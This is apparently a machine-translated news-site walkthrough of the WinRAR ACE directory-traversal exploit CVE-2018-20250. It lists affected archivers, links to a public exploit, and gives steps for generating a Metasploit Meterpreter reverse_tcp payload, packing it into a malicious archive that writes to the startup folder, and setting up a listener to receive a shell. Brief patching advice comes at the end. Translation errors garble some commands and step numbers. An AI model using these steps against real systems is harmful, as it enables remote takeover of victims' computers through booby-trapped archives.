WinRAR directory traversal vulnerability 01/18 Update SLTechnology News&Howtos

WinRAR directory traversal vulnerability

2025-01-18 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)06/01 Report--

The flaw is caused by UNACEV2.dll, an obsolete dynamic link library used by WinRAR, which was compiled in 2006 without any basic protection mechanism (ASLR,DEP, etc.). The purpose of this dynamic link library is to deal with files in ACE format. There is a directory traversal vulnerability in the decompression process, which allows the decompression process to write a file to the boot entry, resulting in code execution.

Vulnerability number: CVE-2018-20250

Affect the version:

WinRAR

< 5.70 Beta 1 Bandizip < = 6.2.0.0 好压(2345压缩) < = 5.9.8.10907 360压缩 < = 4.0.0.1170

Recurring environment

Exp download:

Https://github.com/WyAtu/CVE-2018-20250/

Recurrence process

1. Use Metasploit to generate Payload

two。 Use exp to generate malicious programs

Cd / root/Desktopgit clone https://github.com/WyAtu/CVE-2018-20250.gitcd CVE-2018-20250cp / root/WinRAR.exe. / vim exp.py

Change evil_filename = "calc.exe" to "WinRAR.exe" in exp.py

Copy the CVE-2018-20250 folder to Windows10 to execute

3. Run a malicious program on the target

Put test.rar into win8 to decompress and run.

4. Listening to metasploit on kali

Msf exploit (handler) > set payload windows/meterpreter/reverse_tcpmsf exploit (handler) > set lhost 192.168.112.140msf exploit (handler) > set lport 44444msf exploit (handler) > run www.gendan5.com

5. Control target machine

After Win8 restart, kali will accept that the session will execute shell at this time.

System access to win8 system

Vulnerability defense

1. Deleting UNACEV2.dll files in the affected compressed software directory can effectively defend against

two。 Upgrade to the latest version, the current version of WinRAR is 5.70 Beta 1

3. All in all, the loophole is not that deadly. To hit the target station, you have to deceive the download first, and then decompress it on an unprotected server, which is difficult for enterprise server administrators to do. And the server must be restarted to take effect, and the script cannot be executed directly.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.